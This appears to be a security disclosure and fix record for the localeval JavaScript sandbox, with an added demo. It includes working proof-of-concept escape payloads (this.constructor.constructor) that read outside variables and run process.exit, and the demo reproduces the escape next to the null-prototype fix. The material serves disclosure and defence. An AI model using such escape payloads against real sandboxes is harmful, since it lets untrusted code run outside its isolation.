On both Node.js and the browser the sandbox can be trivially broken, i.e. one can access variables outside the sandbox and execute non-sandboxed code.
Proof of concept for variable access:
```js
var le = require("localeval");
var hiddenVariable = 123; // It shouldn't be accessible from inside the sandbox, right?
console.log(le("this.constructor.constructor('return hiddenVariable')()")); // Prints "123"
```
Proof of concept for code execution on Node.js:
```js
var le = require("localeval");
le("this.constructor.constructor('process.exit(0)')()");
console.log("This is never executed.");
```
Proof of concept for code execution on the browser:
We were calling the function with
fn.apply(0, ...)
which caused the `this` object to be a number,
leaking the Number prototype into the environment
and allowing access to outside variables.
We instead now use an object with no prototype.
It incidentally tackles part of #9 in the browser context.
This protects from a vulnerability related to #9.
Ensuring the code runs in a process with no rights,
ensures that any vulnerability cannot get undue access,
thanks to OS-level protections.
It is a strong safety guarantee.
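The `this` leak described in the commit message above, shown as an added example that is not localeval's own code. The sandbox stand-in (`makeSandbox`, `attempt`, the `blocked` list and `hiddenVariable` placed on the global object) is invented for illustration: it models only how sandboxed code receives its `this` value and how outside names are shadowed, not the library's real implementation.

```javascript
// Added example, not localeval's code. makeSandbox, attempt, blocked and
// hiddenVariable are invented for illustration.

// A variable living outside the sandbox. It is put on the global object so
// that a function compiled by the global Function constructor can see it.
globalThis.hiddenVariable = 123;

// Stand-in sandbox: each name in `blocked` is shadowed by a parameter that
// is passed as undefined, so sandboxed code cannot reach it by name.
// `thisValue` is what the compiled function is invoked with; the vulnerable
// version used fn.apply(0, ...), the fix uses an object with no prototype.
function makeSandbox(blocked, thisValue) {
  return function run(code) {
    // Function(param1, ..., body) compiles `code` in the global scope.
    var fn = Function.apply(null, blocked.concat([code]));
    var shadows = blocked.map(function () { return undefined; });
    return fn.apply(thisValue, shadows);
  };
}

// Run `code` in `sandbox`, reporting either the returned value or the error
// class, so the escape and the fix can be compared side by side.
function attempt(sandbox, code) {
  try {
    return { ok: true, value: sandbox(code) };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}

var blocked = ['hiddenVariable'];

// Vulnerable: `this` is the primitive 0, which sloppy-mode code boxes into a
// Number object. this.constructor is Number and Number.constructor is the
// global Function constructor, so the sandboxed code can compile and run a
// new function in the outer (global) scope, bypassing the shadowing.
var vulnerableSandbox = makeSandbox(blocked, 0);

// Fixed: `this` has no prototype, hence no `constructor` property at all.
var fixedSandbox = makeSandbox(blocked, Object.create(null));

var ESCAPE = "return this.constructor.constructor('return hiddenVariable')()";

function demo() {
  return {
    // Shadowing works as intended: direct access sees undefined.
    direct: attempt(vulnerableSandbox, 'return hiddenVariable'),
    // ...but the escape through `this` reads the outside value (123).
    escaped: attempt(vulnerableSandbox, ESCAPE),
    // With a null-prototype `this` the same payload fails with a TypeError.
    fixed: attempt(fixedSandbox, ESCAPE),
    // What the fixed sandbox finds when it looks for a constructor: nothing.
    thisConstructor: attempt(fixedSandbox, 'return typeof this.constructor')
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

`Function.apply(null, ...)` is used instead of `new Function(...)` only because the parameter list is built dynamically. Note that the null-prototype `this` closes this particular route to the Function constructor; the OS-level isolation described in the last commit message is what actually bounds the damage if another route is found.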
Credit to vm2 for exposing this attack method.